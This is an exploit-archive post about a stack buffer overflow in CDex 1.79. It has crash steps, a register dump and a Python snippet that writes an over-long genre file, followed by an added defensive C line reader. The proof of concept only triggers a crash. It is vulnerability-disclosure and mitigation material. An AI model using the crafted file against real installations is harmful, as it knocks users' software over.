CDex Genre 1.79 Stack Buffer Overflow
Posted on 13 October 2015
r'''
********************************************************************************************
# Exploit Title: CDex Genre Stack Buffer Overflow
# Date: 10/9/2015
# Exploit Author: Un_N0n
# Software Link: http://cdex.mu/download
# Version: 1.79
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- Generate a file with the Python code below.
2- Go to C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB
3- Replace the old CDexGenres.txt with the new CDexGenres.txt produced by the Python code.
4- Open CDex.exe.
~Software will crash.

Further analysis shows that it is a stack-based buffer overflow.

[REG-DUMP]:

EAX 00000000
ECX 779DD018 ASCII " STATUS_STACK_BUFFER_OVERRUN encountered "   //May be handled, yet the application crashes.
EDX 0012F1A1 ASCII 0A,"STATUS_STA"
EBX 00749338 CDex.00749338
ESP 0012F3E8
EBP 0012F464
ESI 00000000
EDI 002C7AC8
EIP 779DCE96 kernel32.779DCE96

0012F3F4 002C7AC8
0012F3F8 002E25F8 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F3FC 002E5FD8
0012F400 002E44A0
0012F404 000003F8
0012F408 0000007F
0012F40C 0012F504
0012F410 00260000
0012F414 77C97B89 RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong
0012F418 002E2580 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F41C 00001190
'''

# [Code to produce CDexGenres.txt]
buffer = "A" * 66666  # one 66666-character line with no newline
file = "CDexGenres.txt"
with open(file, "w") as f:  # written to the current directory
    f.write(buffer)

'''
**********************************************************************************************
'''
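
The generated file is a single 66666-byte line, so the defensive counterpart is a line reader that cannot write past its buffer and rejects an over-long line as a whole. The C code below is an added example, not CDex code and not the exploit author's; GENRE_LINE_MAX, read_genre_line, scan_genres, make_sample and the sample entry are assumptions, since the page gives neither CDex's parser nor its buffer size.

```c
#include <stdio.h>
#include <string.h>

#define GENRE_LINE_MAX 256 /* assumed cap; the page does not give CDex's buffer size */
enum line_status { LINE_OK, LINE_EOF, LINE_TOO_LONG };

/* Read one line into out[cap] without writing past cap bytes. A line that does
 * not fit is rejected whole and drained, so its tail is never parsed as entries. */
static enum line_status read_genre_line(FILE *fp, char *out, size_t cap)
{
    if (cap < 2 || fgets(out, (int)cap, fp) == NULL) return LINE_EOF;
    size_t n = strlen(out);
    int c = (n > 0 && out[n - 1] == '\n') ? '\n' : fgetc(fp);
    if (c != EOF && c != '\n') {            /* more bytes follow: line too long */
        while (c != '\n' && c != EOF) c = fgetc(fp);
        out[0] = '\0';
        return LINE_TOO_LONG;
    }
    out[strcspn(out, "\r\n")] = '\0';       /* cut at the CR/LF terminator */
    return LINE_OK;
}

/* Constructed sample: the page's 66666-byte line, then one short made-up entry. */
static FILE *make_sample(void)
{
    FILE *fp = tmpfile();
    for (int i = 0; fp && i < 66666; i++)
        fputc('A', fp);
    if (fp) { fputs("\nshort constructed entry\r\n", fp); rewind(fp); }
    return fp;
}

/* Returns the number of accepted lines; *rejected counts over-long ones. */
static int scan_genres(FILE *fp, int *rejected)
{
    char line[GENRE_LINE_MAX];
    enum line_status st;
    int accepted = 0;
    for (*rejected = 0; (st = read_genre_line(fp, line, sizeof line)) != LINE_EOF; )
        if (st == LINE_TOO_LONG) (*rejected)++; else accepted++;
    return accepted;
}

int main(void)
{
    FILE *fp = make_sample();
    int rejected = 0, accepted = fp ? scan_genres(fp, &rejected) : 0;
    printf("accepted=%d rejected=%d\n", accepted, rejected);
    return fp ? fclose(fp) : 1;
}
```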